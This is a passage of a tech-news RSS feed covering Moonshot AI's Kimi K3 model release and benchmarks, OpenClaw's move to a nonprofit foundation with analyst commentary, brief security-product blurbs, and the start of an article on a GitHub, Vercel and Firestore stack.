<guid isPermaLink="true">https://tsecurity.de/de/3674665/it-nachrichten/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-us-systems/</guid>
<pubDate>Thu, 16 Jul 2026 23:17:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.moonshot.ai/">Moonshot AI,</a> the Beijing-based artificial intelligence startup backed by Alibaba, on Thursday released <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> — a 2.8-trillion-parameter model that the company says is now the largest open-source AI model in the world, and one that benchmarks show performs neck-and-neck with the most powerful proprietary systems from <a href="https://www.anthropic.com/">Anthropic</a> and <a href="https://openai.com/">OpenAI</a>.</p><p>The release, timed to land just ahead of the <a href="https://aiii.global/waic-2026/">2026 World Artificial Intelligence Conference</a> in Shanghai, is a dramatic escalation in the global AI arms race and a watershed moment for the open-source AI movement. It also marks a remarkable comeback for a company whose market position had eroded significantly over the past 18 months following DeepSeek's meteoric rise.</p><p>Full model weights are scheduled to be released on July 27, according to details shared by researchers who reviewed the company's technical documentation. If you want to take <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> for a spin right now, you can — just head to<a href="https://www.kimi.com/"> kimi.com</a>, sign up with a Google account or phone number (no credit card required), and start chatting with what may be the most powerful open-source model ever built.</p><div></div><h2><b>Inside the architecture that powers the world's largest open-source AI model</b></h2><p><a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> is a frontier-class large language model with 2.8 trillion total parameters — roughly 75 percent larger than <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro">DeepSeek's V4 Pro</a>, which the company's own timeline chart shows at approximately 1.6 trillion parameters. The model features a 1-million-token context window, native visual understanding capabilities, and an always-on reasoning mode that the company calls "thinking mode."</p><p>The model is built on two key architectural innovations developed internally at Moonshot AI: <a href="https://arxiv.org/abs/2510.26692">Kimi Delta Attention</a>, a hybrid linear attention mechanism, and <a href="https://arxiv.org/abs/2603.15031">Attention Residuals</a>, which the company describes as a drop-in replacement for residual connections that delivers consistent scaling gains. Both techniques were previously published as open research by the Moonshot team on <a href="https://github.com/moonshotai">GitHub</a>.</p><p>On the <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">API side</a>, Kimi K3 is compatible with the <a href="https://developers.openai.com/api/docs/guides/agents">OpenAI SDK</a>, lowering the integration barrier for developers already building on OpenAI or Anthropic toolchains. The model is priced at $3 per million input tokens and $15 per million output tokens, with cached input tokens dropping to just $0.30 per million — pricing that positions it roughly in line with mid-tier offerings from Western labs, but at a performance level the company claims approaches the top of the market. A promotional top-up rebate running through August 12 offers up to 30 percent back in vouchers for API credits of $1,000 or more.</p><p>As <a href="https://finance.sina.com.cn/stock/t/2026-07-17/doc-inihzrtu1375218.shtml?cref=cj">Xinhua reported</a>, a Moonshot AI executive explained the significance of the parameter count in simple terms: parameters are like neural connections in the human brain, and nearly 3 trillion of them means the model can "store more knowledge and patterns in its brain, understand more, think deeper, and answer more accurately."</p><div></div><h2><b>Benchmark results show Kimi K3 trading blows with Claude and GPT at the top of the leaderboard</b></h2><p>The benchmark results, drawn from public leaderboard data and a private evaluation by analytics firm Artificial Analysis, tell a striking story.</p><p>On <a href="https://artificialanalysis.ai/evaluations/gdpval-aa">GDPval-AA v2</a>, a benchmark measuring real-world tasks across 44 occupations and 9 major industries, Kimi K3 scored 1,687 — placing it third overall, behind only Claude Fable 5 Max (1,815) and GPT-5.6 Sol Max (1,747.8), and ahead of Claude Opus 4.8 (1,600).</p><p>On <a href="https://artificialanalysis.ai/evaluations/aa-briefcase">AA-Briefcase</a>, a private agentic benchmark from Artificial Analysis designed to test long-horizon knowledge work, K3 climbed to second place with a score of 1,527 — beating GPT-5.6 Sol Max (1,495) and trailing only Fable 5 Max (1,587).</p><p>Perhaps most impressively, K3 achieved a state-of-the-art score of 91.2 out of 100 on <a href="https://openai.com/index/browsecomp/">BrowseComp</a>, a benchmark for long-horizon, high-difficulty information seeking. </p><p>The company says it accomplished this in a single-agent setup using its 1-million-token context window, without any context compression or additional context management techniques — a feat that suggests raw context length, when paired with strong retrieval capabilities, may be more powerful than elaborate multi-agent workarounds.</p><p>As <a href="https://x.com/kimmonismus/status/2077818040578695175">one widely followed AI commentator</a> put it on social media: "Open source is no longer lagging six months behind Western closed-source models. Read that again, and think about what it all means."</p><p>That observation captures the significance of the moment. For much of the past three years, open-source models have typically trailed their proprietary counterparts by a meaningful margin. Kimi K3 appears to have closed that gap almost entirely.</p><h2><b>How a 48-hour autonomous chip design demo reveals Moonshot's real ambitions</b></h2><p>Beyond raw benchmarks, <a href="https://www.moonshot.ai/">Moonshot AI</a> showcased a proof-of-concept that may be even more revealing of K3's capabilities and the company's strategic direction.</p><p>In a demonstration documented in the company's technical materials, <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> was tasked with designing a physical chip to run a nano-scale version of itself. Over 48 hours of continuous autonomous agent operation, K3 independently completed the chip's full construction pipeline — from architectural design through optimization and verification — using open-source electronic design automation tools. The result was a tiny but functional chip design, just 4 square millimeters, that achieved timing convergence at 100 MHz and could decode more than 8,700 tokens per second in simulation.</p><p>This is not a production chip. It is a demonstration of what <a href="https://www.moonshot.ai/">Moonshot AI</a> clearly views as the next competitive frontier: long-range autonomous agent capabilities. The ability to sustain coherent, multi-step technical work over a 48-hour window — reading documentation, making design decisions, running verification loops, and iterating on failures — represents a qualitative leap beyond the kind of single-turn question-answering that defined the first generation of large language models.</p><p>The company also highlighted a case in computational astrophysics, where K3 reportedly reproduced the universal <a href="https://inspirehep.net/literature/1220233">I-Love-Q relation</a> — a complex calculation that typically takes a senior researcher one to two weeks — in approximately two hours, reading and cross-validating more than 20 papers and implementing a complete numerical pipeline along the way.</p><h2><b>Moonshot AI's fall and rise tells the story of China's brutal AI market</b></h2><p>To understand why <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> matters, you need to understand where Moonshot AI was 18 months ago — and how far it fell.</p><p>Founded in 2023 by <a href="https://kimiyoung.github.io/">Yang Zhilin</a>, a Tsinghua University graduate who previously conducted research at Google and Meta, Moonshot AI quickly became one of China's most prominent AI startups. The company gained early traction in 2024 when users flocked to its <a href="http://kimi.ai/">Kimi platform</a> for its long-text analysis capabilities and AI search functions. By early 2026, it had raised roughly <a href="https://www.forbes.com/sites/the-prompt/2026/07/15/ai-startup-reflection-compute-deal-to-challenge-chinas-open-source-dominance/">$1.5 billion</a> across multiple rounds, with its valuation climbing from $2.5 billion to $4.3 billion and the company reportedly <a href="https://tech.yahoo.com/ai/gemini/articles/china-moonshot-releases-open-source-141110760.html">seeking a new round at $5 billion</a>.</p><p>Then DeepSeek happened. The release of DeepSeek's low-cost R1 model in January 2025 disrupted the entire Chinese AI landscape, and Moonshot AI was among the hardest hit. Kimi, which had ranked third in monthly active users in China, slid to seventh. The company's strategic pivot to open-source models — beginning with Kimi K2 in July 2025 and accelerating with K2.5 in January 2026 — was in large part an effort to reclaim relevance.</p><p><a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> is the culmination of that effort — and the sheer scale of the model suggests that Moonshot AI has been planning this move for some time. Training a 2.8-trillion-parameter model requires enormous computational resources and months of preparation, which means the architectural and infrastructure decisions behind K3 were likely locked in well before the model reached the public.</p><h2><b>Why open-sourcing the world's biggest model is a geopolitical chess move</b></h2><p>The decision to release K3's full weights on July 27 is strategically significant and worth parsing carefully.</p><p>The company's own timeline chart of open-source frontier model scale positions K3 as a dramatic outlier, towering above competitors like <a href="https://github.com/deepseek-ai">DeepSeek</a> (1.6T), <a href="https://github.com/xiaomi">Xiaomi</a> (1.02T), and <a href="https://github.com/ALIBABA">Alibaba</a> (397B). By releasing the world's largest open-source model, Moonshot AI is making a bid to become the center of gravity for the global open-source AI developer community.</p><p>This follows a broader trend among Chinese AI companies. As <a href="https://www.reuters.com/technology/artificial-intelligence/china-weighs-silicon-curtain-around-sought-after-ai-models-2026-07-08/">Reuters noted</a>, open-sourcing allows companies to "showcase their technological capabilities and expand developer communities as well as their global influence, a strategy likely to help China counter U.S. efforts to limit Beijing's tech progress." DeepSeek, Alibaba, Tencent, and Baidu have all released open-source models. But none have released anything at this parameter count.</p><p>For enterprise technology leaders, the implications are concrete. A 2.8-trillion-parameter open-source model that performs at near-frontier levels creates new options for companies that want to fine-tune, self-host, or build proprietary systems on top of a capable base model — without being locked into API contracts with OpenAI or Anthropic. The trade-off, of course, is that running a model of this size requires substantial GPU infrastructure. Inference at 2.8 trillion parameters is not something that runs on a single server rack.</p><p>That said, <a href="https://www.moonshot.ai/">Moonshot AI</a> has signaled awareness of this challenge. Its Mooncake project, which won the Best Paper award at FAST 2025, pioneered KV-cache-centric disaggregated serving for large language models — an architecture designed specifically to make inference at extreme scale more practical and cost-efficient.</p><h2><b>Kimi Code and a three-tier model lineup form the foundation of Moonshot's enterprise play</b></h2><p>Alongside K3, Moonshot AI continues to invest heavily in its coding agent ecosystem. <a href="https://github.com/MoonshotAI/kimi-code/releases">Kimi Code</a>, the company's open-source coding tool that competes with Anthropic's Claude Code and Google's Gemini CLI, received two major updates on the same day as K3's launch — versions 0.25.0 and 0.26.0 — adding features like expanded subagent tooling, background task management, and security fixes.</p><p>The <a href="https://github.com/MoonshotAI/kimi-cli">Kimi Code CLI</a> has accumulated over 3,100 stars on GitHub and features integration with VSCode, Cursor, and Zed. The latest release expanded the "coder subagent" tool set to include background tasks, todo lists, plan mode, skill invocation, and nested agents — effectively turning the coding agent into a multi-layered autonomous system capable of managing complex software engineering projects with minimal human intervention.</p><p>This is not incidental. Coding tools have become a critical revenue driver for AI labs. As Anthropic disclosed in January, <a href="https://www.anthropic.com/news/anthropic-acquires-bun-as-claude-code-reaches-usd1b-milestone">Claude Code reached $1 billion in annualized recurring revenue</a>. By building Kimi Code as an open-source alternative that defaults to Kimi's own models — but supports other providers — Moonshot AI is positioning itself to capture developer workflows and, eventually, enterprise contracts.</p><p>The company's model lineup now includes three tiers: <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">K3</a> as the flagship ($3/$15 per million tokens for input/output), <a href="https://platform.kimi.ai/docs/guide/kimi-k2-7-code-quickstart">K2.7 Code</a> as a specialized coding model ($0.95/$4), and <a href="https://platform.kimi.ai/docs/guide/kimi-k2-6-quickstart">K2.6</a> as a general-purpose option ($0.95/$4). All three support context windows of 256,000 tokens or above, with K3 offering the full 1-million-token window. Context caching is automatic — no cache ID, TTL, or extra parameter is required — a small but meaningful developer-experience advantage over competitors that require explicit cache management.</p><h2><b>What Kimi K3 means for the future of enterprise AI and the global model landscape</b></h2><p>Kimi K3's release forces a recalibration of several assumptions that have guided enterprise AI strategy.</p><p>The performance gap between open-source and proprietary models has functionally closed at the frontier. If K3's benchmark numbers hold up under independent evaluation — and particularly once the open weights are available for community testing on July 27 — it will be difficult for closed-source providers to justify premium pricing purely on the basis of capability.</p><p>The locus of AI innovation, meanwhile, continues to shift. China's AI ecosystem, which many Western observers questioned after early struggles with chip export restrictions, has now produced a model that competes with the best systems from companies with direct access to Nvidia's most advanced hardware. The architectural innovations behind K3 — particularly the hybrid linear attention mechanism — suggest that algorithmic efficiency may matter as much as raw compute.</p><p>And the agentic capabilities demonstrated by K3 — chip design, multi-week research compression, long-horizon information seeking — point toward a future where AI models are not just answering questions but autonomously executing complex, multi-day projects. For enterprises evaluating AI investments, this shifts the value proposition from "productivity copilot" to "autonomous technical workforce."</p><p><a href="https://finance.sina.com.cn/stock/t/2026-07-17/doc-inihzrtu1375218.shtml?cref=cj">Xinhua</a>, China's state news agency, framed the release as a national milestone, reporting that K3 "marks a new step forward in the development of China's artificial intelligence models." Liu Tieyan, dean of the Zhongguancun Academy in Beijing, was quoted as saying that a wave of Chinese open-source models has moved from isolated breakthroughs to collective advancement, providing "new solutions and new paths" for global AI development.</p><p>Just two years ago, <a href="https://www.moonshot.ai/">Moonshot AI</a> was a scrappy startup named for the audacious problems it hoped to solve. Eighteen months ago, it was a cautionary tale about how quickly a market darling can lose its footing. Today, it is the maker of the world's largest open-source AI model — one that can, given 48 hours and an internet connection, design a chip to run itself. The frontier, it turns out, is not a place. It is a race. And the field just got a lot more crowded.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ValorC3 extends SaaS protection with immutable cloud backups]]></title>
<description><![CDATA[ValorC3 Data Centers today announced the general availability of Backup as a Service, a fully managed offering that protects the SaaS data businesses rely on most, including Microsoft 365, Entra ID and Salesforce. Every backup is immutable, so data stays recoverable after deletion, corruption or ...]]></description>
<link>https://tsecurity.de/de/3673422/it-security-nachrichten/valorc3-extends-saas-protection-with-immutable-cloud-backups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673422/it-security-nachrichten/valorc3-extends-saas-protection-with-immutable-cloud-backups/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ValorC3 Data Centers today announced the general availability of Backup as a Service, a fully managed offering that protects the SaaS data businesses rely on most, including Microsoft 365, Entra ID and Salesforce. Every backup is immutable, so data stays recoverable after deletion, corruption or a ransomware attack. Most companies falsely assume SaaS vendors provide backup service. In reality, recent cloud governance tracking shows that 80% of organizations have experienced at least one cloud security … <a href="https://www.helpnetsecurity.com/2026/07/16/valorc3-backup-as-a-service-baas/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/valorc3-backup-as-a-service-baas/">ValorC3 extends SaaS protection with immutable cloud backups</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ValorC3 extends SaaS protection with immutable cloud backups]]></title>
<description><![CDATA[ValorC3 Data Centers today announced the general availability of Backup as a Service, a fully managed offering that protects the SaaS data businesses rely on most, including Microsoft 365, Entra ID and Salesforce. Every backup is immutable, so data stays…
Read more →
The post ValorC3 extends SaaS...]]></description>
<link>https://tsecurity.de/de/3673357/it-security-nachrichten/valorc3-extends-saas-protection-with-immutable-cloud-backups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673357/it-security-nachrichten/valorc3-extends-saas-protection-with-immutable-cloud-backups/</guid>
<pubDate>Thu, 16 Jul 2026 14:06:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ValorC3 Data Centers today announced the general availability of Backup as a Service, a fully managed offering that protects the SaaS data businesses rely on most, including Microsoft 365, Entra ID and Salesforce. Every backup is immutable, so data stays…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/valorc3-extends-saas-protection-with-immutable-cloud-backups/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/valorc3-extends-saas-protection-with-immutable-cloud-backups/">ValorC3 extends SaaS protection with immutable cloud backups</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Data and identity controls for the browser and network]]></title>
<description><![CDATA[Author: Microsoft Security - Bewertung: 0x - Views:0 Sensitive data doesn't stay still. It moves through browsers, SaaS apps, generative AI tools, and prompts; often beyond the visibility of traditional controls.

See how Microsoft Entra and Purview bring real-time visibility and control to sensi...]]></description>
<link>https://tsecurity.de/de/3672029/it-security-video/data-and-identity-controls-for-the-browser-and-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672029/it-security-video/data-and-identity-controls-for-the-browser-and-network/</guid>
<pubDate>Thu, 16 Jul 2026 00:32:52 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Microsoft Security - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/KQwY--Azhlc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Sensitive data doesn't stay still. It moves through browsers, SaaS apps, generative AI tools, and prompts; often beyond the visibility of traditional controls.<br />
<br />
See how Microsoft Entra and Purview bring real-time visibility and control to sensitive data in motion across the network. You’ll learn how integrated data security and secure access controls can help reduce leakage risk, support responsible AI adoption, and enable modern work without slowing your business down.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’]]></title>
<description><![CDATA[OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that the popular platform has thus far lacked. Still, some worry about the risks created by the move. 



“Our ambition is for OpenClaw...]]></description>
<link>https://tsecurity.de/de/3671162/ai-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671162/ai-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" target="_blank">the popular platform </a>has thus far lacked. Still, some worry about the risks created by the move. </p>



<p class="wp-block-paragraph">“Our ambition is for OpenClaw to be the Switzerland of AI. Neutral ground where every model and every lab can plug into the technology and collaborate on standards in the era of agents,” <a href="https://openclaw.ai/blog/introducing-openclaw-foundation/" target="_blank" rel="noreferrer noopener">OpenClaw said in a post</a>. “That work is already underway in Foundation-convened councils on agent identity, agent profiles, evals, and enterprise deployment.”</p>



<p class="wp-block-paragraph">The statement, co-authored by OpenClaw creator <a href="https://www.linkedin.com/in/steipete/" target="_blank" rel="noreferrer noopener">Peter Steinberger</a>, pointed out, “the great open source projects of our time — Linux, Apache, Mozilla — endure because a neutral steward stands behind them. That is the role we are taking on to keep OpenClaw MIT licensed, open, and independent so that everyone building on it can trust it will be here for the long term.”</p>



<p class="wp-block-paragraph">But it reassured users that the original OpenClaw leadership is still in charge.</p>



<p class="wp-block-paragraph">“Peter built this thing and Peter keeps making the calls, especially the technical ones. Since joining OpenAI earlier this year, he has continued to steward OpenClaw as an open and independent project, and OpenAI has made a commitment to keep it that way,” the post said. “The foundation is here to serve: good governance, stable funding, and paying the people who keep the claws alive.”</p>



<p class="wp-block-paragraph">However, some analysts and consultants were skeptical about how much true independence Steinberger would have, given his salaried role with OpenAI. </p>



<h2 class="wp-block-heading">Neutrality claim in question</h2>



<p class="wp-block-paragraph">“The Switzerland of AI neutrality claim collapses under its own announcement,” said <a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520. “OpenAI runs a team [at OpenAI] called Claw Labs that Peter leads and OpenAI is a major donor to OpenClaw. The ‘neutral steward’s’ chief technical decision maker is employed by one of the competing labs it is supposed to be neutral with.” To OpenAI, he said, OpenClaw is closer to a tax-exempt nonprofit subsidiary than it is to a neutral ‘Switzerland of AI.’</p>



<p class="wp-block-paragraph">He pointed out that, in addition, Microsoft is shipping <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html" target="_blank">the enterprise version</a> of OpenClaw, and Nvidia is shipping the hardware bundle. “This is being called the Switzerland of AI, but Switzerland does not have its central bank run by France,” he observed.</p>



<p class="wp-block-paragraph">Kenney said that what the new OpenClaw has actually built is “a shared dependency that several competitors fund, staff, and steer, wrapped in a nonprofit structure. Enterprise IT should understand that structure, because treating OpenClaw as neutral is a mistake,” adding that CIOs need to look at this development devoid of the emotional component. </p>



<p class="wp-block-paragraph">“There is a strategic irony here that CIOs should sit with,” Kenney said. “If OpenClaw succeeds at becoming the universal agent substrate, then every model plugs into the same identity layer, the same profiles, and the same deployment plumbing. The thing every vendor is racing to own becomes a commodity that nobody owns.” He pointed out that, in the short term, that is genuinely good news for buyers because it means less lock-in and more portability.</p>



<p class="wp-block-paragraph">“But,” he said, “when the connective tissue is free and natural, the only labs that benefit are the ones with the best models and the deepest distribution. Commoditize the layer below you and you compete on the layer where you are already strongest. The foundation is not a charity. It is the biggest players agreeing to stop fighting over the plumbing so they can fight over the water, and the enterprise is the one paying the water bill either way.”</p>



<h2 class="wp-block-heading">Good news, bad news</h2>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, liked the potential consistency that could emerge from the structural change, given the complexity of agent development today. </p>



<p class="wp-block-paragraph">“We are seeing a lot of OpenClaw variants hit the market, such as those from Nvidia as well as competing products from cloud and SaaS vendors. A common base helps solidify the common parts,” Andersen noted. “That said, a common challenge is the sustainability of these open source foundations over time. In addition to releasing code, these foundations need funding to evolve and grow. And that funding needs to come from continued momentum to incentivize existing members to increase investment and recruit new members to join.”</p>



<p class="wp-block-paragraph">Andersen stressed that IT buyers need to keep an eye on the roadmap for any OpenClaw variant they choose to deploy, “as that will directly impact the foundation, and the momentum of the foundation and common base. If the common base loses momentum, it can lead to forks, or just a loss of innovation. When that happens, members tend to back away, which puts customers in limbo.”</p>



<p class="wp-block-paragraph">But not everyone sees the promised structure as entirely good for IT.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO at coding productivity tool vendor Kodezi, said, “most CIOs do not want to bet their future entirely on a single model vendor. They want Claude for some workloads, GPT for others, open models for sensitive environments, and potentially internally fine-tuned systems for specific use cases. The problem is that every vendor currently brings its own identity system, tool interfaces, permissions model, and operational assumptions. That fragmentation does not scale.”</p>



<p class="wp-block-paragraph">He said, “the risk if standards fail is straightforward: every vendor builds its own closed ecosystem, enterprises become locked into individual stacks, and security becomes dramatically harder. The opportunity if OpenClaw succeeds is equally significant: enterprises get portable agents, common identity standards, interoperable tooling, and a healthier competitive market around models rather than ecosystems.”</p>



<h2 class="wp-block-heading">Will it remain a nonprofit?</h2>



<p class="wp-block-paragraph">However, said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, one of the key details that IT executives will want to keep in mind is that OpenAI also began as a nonprofit, but it was quickly <a href="https://www.computerworld.com/article/4056490/openai-microsoft-discuss-shape-of-future-relationship.html" target="_blank">seen as not adhering to nonprofit objectives</a>. </p>



<p class="wp-block-paragraph">“OpenAI’s transition from a nonprofit research organization into a more complex structure highlighted the challenge of maintaining mission alignment while scaling technology, capital, partnerships, and commercial operations,” Greis said. “OpenClaw has the opportunity to address some of those governance questions earlier by establishing clear principles around neutrality, transparency, and decision-making before the ecosystem becomes even larger and more valuable.”</p>



<p class="wp-block-paragraph">He noted, “we have seen this pattern before with technologies like Linux and Kubernetes. The strongest open ecosystems succeeded because they created trusted foundations that enterprises could build upon. The technology was important, but the governance model that underpinned it was equally critical.”</p>



<h2 class="wp-block-heading">Risks are ‘squarely in IT’s lap’</h2>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, echoed Greis’ concerns. </p>



<p class="wp-block-paragraph">“CIOs shouldn’t assume that this nonprofit will always be a nonprofit, or confuse being a nonprofit with actually being neutral or unbiased,” he said. “The risks are squarely in IT’s lap: autonomous agents ‘with their own identity’ acting on a user’s behalf blow straight through traditional IAM assumptions. Issues, such as agent identity, auditability, secret handling. Identity boundaries have not yet been reliably solved. Until they are, enterprises should treat OpenClaw agents like privileged service accounts, not like a browser plugin.”</p>



<p class="wp-block-paragraph">Independent cybersecurity and risk advisor <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a> pointed to another IT exposure that might come from this OpenClaw transition: Cost.</p>



<p class="wp-block-paragraph">“OpenClaw currently has a very high token burn rate in usage, which presents a significant cost consideration for large-scale enterprise adoption,” he said. “The skills marketplace introduces <a href="https://www.csoonline.com/article/4129867/what-cisos-need-to-know-about-clawdbot-i-mean-moltbot-i-mean-openclaw.html" target="_blank">a new supply chain threat </a>that enterprises will need to manage. Threat management, and specifically handling <a href="https://www.csoonline.com/article/4135449/compromised-npm-package-silently-installs-openclaw-on-developer-machines.html" target="_blank">external marketplace elements</a>, can be highly challenging for open-source operations. Ultimately, at scale, enterprise adoption could become a difficult balancing act between managing high operational costs and securing an expanded security surface.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">Computerworld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ship faster with GitHub, Vercel, and Firestore]]></title>
<description><![CDATA[These days, application developers can take their pick from a vast menu of architectural solutions. We can choose from the well-understood to the experimental, and from blended solutions in between. Several powerful middle-ground technologies that emerged during the cloud revolution have really c...]]></description>
<link>https://tsecurity.de/de/3671151/ai-nachrichten/ship-faster-with-github-vercel-and-firestore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671151/ai-nachrichten/ship-faster-with-github-vercel-and-firestore/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:19 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">These days, application developers can take their pick from a vast menu of architectural solutions. We can choose from the well-understood to the experimental, and from blended solutions in between. Several powerful middle-ground technologies that emerged during the cloud revolution have really come of age. Here we’ll take a look at putting together three of the most impressive: GitHub, Vercel, and Firestore.</p>



<p class="wp-block-paragraph">Each of these is an important tool in its own right that can be used to attack specific problems. In combination, they not only meet the needs of several important application scenarios, but they have a superpower—the ability to dramatically shorten the distance between development and deployment.</p>



<p class="wp-block-paragraph">There is nothing quite as gratifying as putting your hands on just the right mix of tools for a given need.</p>



<h2 class="wp-block-heading">A ‘no-ops’ stack built for speed</h2>



<p class="wp-block-paragraph">If your primary goal is sheer development velocity, you would be hard-pressed to top this architecture. This “no-ops” stack collapses the distance between your local IDE and a globally distributed production environment. You are essentially trading the overhead of managing VMs and load balancers for the sheer speed of committing code and watching it deploy automatically.</p>



<p class="wp-block-paragraph">While each component is highly flexible, adopting them requires a specific, event-driven mindset. There are a few finicky bits to manage, mostly around routing environment variables securely and designing around stateless back-end functions. But the constraints are obvious and well-documented.</p>



<p class="wp-block-paragraph">Before we look more closely, let’s quickly identify the kinds of apps that are a perfect fit here, along with those that are workable and those that really merit a different approach.</p>



<ul class="wp-block-list">
<li>The sweet spot (deploy and go): AI-mediated applications, asynchronous game back ends, and real-time collaborative B2B dashboards. This architecture perfectly absorbs the unpredictable latency of LLM APIs and instantly syncs state across multiple clients without requiring you to build custom WebSocket infrastructure.</li>



<li>The middle ground (workable, with trade-offs): Headless e-commerce, moderate IoT telemetry, and apps requiring scheduled batch processing. You will encounter friction if your catalog relies on deeply relational SQL constraints, or if your background reporting jobs take longer than a few minutes and hit serverless execution limits.</li>



<li>The danger zone (look elsewhere): High-frequency trading, fast-paced action multiplayer games, heavy data ETL pipelines, and core financial ledgers. Serverless architectures cannot natively hold open the persistent WebSockets required for twitch-reflex data, and heavy compute tasks will abruptly time out.</li>
</ul>



<p class="wp-block-paragraph">We should mention that these categories are not mutually exclusive. Many enterprise applications, such as a full-scale e-commerce platform, straddle these lines. You might use Vercel and Firestore to build a lightning-fast, reactive storefront that handles ephemeral user state like shopping carts, while simultaneously “stitching in” a managed SQL database like Supabase or PlanetScale. This hybrid approach allows you to maintain the relational integrity required for back-office inventory and financial ledgers and pair it with the front-end velocity this stack provides.</p>



<h2 class="wp-block-heading">GitHub: the bedrock</h2>



<p class="wp-block-paragraph">I don’t need to introduce you to <a href="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html" data-type="link" data-id="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html">GitHub</a>. It is a central element of the development landscape. I still remember CVS and SVN with a certain nostalgia, but the enhancements of <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html" data-type="link" data-id="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git</a> speak for themselves. When combined with the orchestration powers of GitHub, it is no wonder that virtually the whole industry has adopted this type of platform.</p>



